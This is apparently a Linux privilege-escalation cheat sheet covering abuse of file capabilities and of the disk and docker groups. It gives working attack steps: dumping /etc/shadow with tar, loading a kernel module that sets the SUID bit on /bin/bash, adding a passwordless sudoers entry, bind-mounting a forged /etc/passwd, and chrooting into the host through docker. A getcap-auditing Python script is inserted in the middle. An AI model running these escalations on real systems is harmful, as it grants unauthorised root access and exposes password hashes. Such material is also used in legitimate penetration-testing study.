Capabilities

Description

Linux capabilities provide a subset of the available root privileges to a process. This effectively breaks root privileges up into smaller, distinct units, each of which can be granted to a process independently. This way the full set of privileges a process holds is reduced, decreasing the risk of exploitation. To better understand how Linux capabilities work, let's first look at the problem they try to solve. Assume we are running a process as a normal user, which means we are unprivileged: we can only access data that is owned by us or our group, or that is marked as accessible to all users. At some point our process needs a little more permission to fulfil its duties, like opening a raw network socket. The problem is that a normal user cannot open such a socket, as this requires root permissions.

Usage

The CAP_DAC_READ_SEARCH capability is set on the /bin/tar binary. As a result, the current user can bypass file read permission checks and directory read/execute permission checks.

tar -cvf /tmp/shadow.tar /etc/shadow

The CAP_SYS_MODULE capability is set on the /bin/kmod binary. As a result, the current user can insert/remove kernel modules into/from the kernel of the host machine.

kernel_module.c

#include <linux/kmod.h>
#include <linux/module.h>

MODULE_LICENSE("GPL");
MODULE_AUTHOR("QU35T");
MODULE_DESCRIPTION("LKM Bash SUID");
MODULE_VERSION("1.0");

/* Command run from kernel context (as root) when the module is loaded:
   sets the SUID bit on /bin/bash, as described above (LKM Bash SUID). */
static char* argv[] = {"/bin/chmod", "u+s", "/bin/bash", NULL};
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL};

static int __init shell_init(void) {
        /* UMH_WAIT_EXEC: wait only until the helper has been exec'd */
        return call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);
}

static void __exit shell_exit(void) {
        printk(KERN_INFO "Exiting\n");
}

module_init(shell_init);
module_exit(shell_exit);

Makefile

obj-m += kernel_module.o

all:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
clean:
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

Execute the new module

make
insmod kernel_module.ko

The CAP_NET_RAW capability is set on the /usr/sbin/tcpdump binary. As a result, the current user can capture traffic on network interfaces.

tcpdump -ni ens3 host $IP

The CAP_DAC_OVERRIDE capability is set on the /usr/bin/vim.basic binary. As a result, the current user can bypass permission checks and read/write any file.

vim /etc/sudoers

qu35t ALL=(ALL) NOPASSWD:ALL

The CAP_SYS_ADMIN capability is set on the /usr/bin/python2.7 binary. As a result, the current user can mount/unmount filesystems. Copy /etc/passwd, generate a password hash to put in the copy, then bind-mount the edited copy over the original:

cp /etc/passwd ./
openssl passwd -1 -salt root password

from ctypes import *

libc = CDLL("libc.so.6")
# int mount(const char *source, const char *target, const char *filesystemtype,
#           unsigned long mountflags, const void *data);
libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)

MS_BIND = 4096
source = "/home/qu35t/passwd"
target = "/etc/passwd"
filesystemtype = "none"
options = "rw"
mountflags = MS_BIND

# Returns 0 on success, -1 on failure (requires CAP_SYS_ADMIN)
libc.mount(source, target, filesystemtype, mountflags, options)

The CAP_SYS_PTRACE capability is present in the permitted set of the /usr/bin/python2.7 binary. As a result, the current user can attach to other processes and trace them.
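Auditing for the capabilities described above is the defensive counterpart of this section. The following Python 3 script is an added example (not part of the original page): it parses the output of getcap -r / 2>/dev/null in both libcap output formats and reports which of the capabilities listed on this page a binary holds, and whether each is effective or, as in the CAP_SYS_PTRACE case above, only permitted. The sample getcap lines are constructed.

```python
"""Audit getcap output for the file capabilities this page shows being abused (added example,
not the page's own code). Handles old libcap "/path = cap_x+ep" and libcap >= 2.41 "/path cap_x=ep"."""
import re
from typing import Dict, List, Tuple

# Capabilities the page shows escalating to root-equivalent access.
RISKY_CAPS = frozenset({"cap_dac_read_search", "cap_dac_override", "cap_sys_module",
                        "cap_sys_admin", "cap_sys_ptrace", "cap_net_raw"})

def parse_getcap_line(line: str) -> Tuple[str, Dict[str, str]]:
    """Return (path, {capability: flags}); e=effective, p=permitted, i=inheritable."""
    line = line.strip()
    if " = " in line:                # old format: path, " = ", clauses
        path, text = line.split(" = ", 1)
    else:                            # new format (paths containing spaces not handled)
        path, text = line.split(None, 1)
    caps: Dict[str, str] = {}
    # cap_from_text(3): whitespace-separated clauses, each "cap_a,cap_b" + action list ("+ep", "=p", "+e-p")
    for clause in text.split():
        m = re.match(r"^([a-z0-9_,]+)([=+\-][a-z=+\-]*)$", clause)
        if not m: raise ValueError(f"unrecognised clause {clause!r} in {line!r}")
        flags: set = set()
        for ch in m.group(2):        # regex guarantees the first char is an operator
            if ch in "=+-":
                op = ch
                if ch == "=":
                    flags = set()    # '=' replaces the flag set, '+'/'-' adjust it
            elif op == "-":
                flags.discard(ch)
            else:
                flags.add(ch)
        for name in m.group(1).split(","):
            caps[name] = "".join(sorted(flags))
    return path, caps

def risky_entries(getcap_output: str) -> List[Tuple[str, str, str]]:
    """(path, capability, flags) per risky capability; no 'e' in flags means permitted only."""
    findings = []
    for line in getcap_output.splitlines():
        if line.strip():
            path, caps = parse_getcap_line(line)
            findings += [(path, c, f) for c, f in caps.items() if c in RISKY_CAPS]
    return findings

# Constructed sample mirroring the binaries named on this page (not a real capture).
SAMPLE = """/bin/tar = cap_dac_read_search+ep
/usr/bin/python2.7 = cap_sys_admin+ep cap_sys_ptrace+p
/usr/sbin/tcpdump cap_net_raw=ep
/usr/bin/gnome-keyring-daemon cap_ipc_lock=ep
"""
```

Every finding still needs review: tcpdump or ping legitimately carry cap_net_raw, so the question for each hit is which users can execute the binary and whether the capability is effective or merely permitted.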

Groups Privesc (GID)

disk group: read the block device directly with debugfs

debugfs /dev/sda
ls /root
cat /etc/shadow

docker group: mount the host root filesystem into a container

docker images
docker run -it --rm -v /:/mnt ubuntu:18.04 chroot /mnt bash
ls /root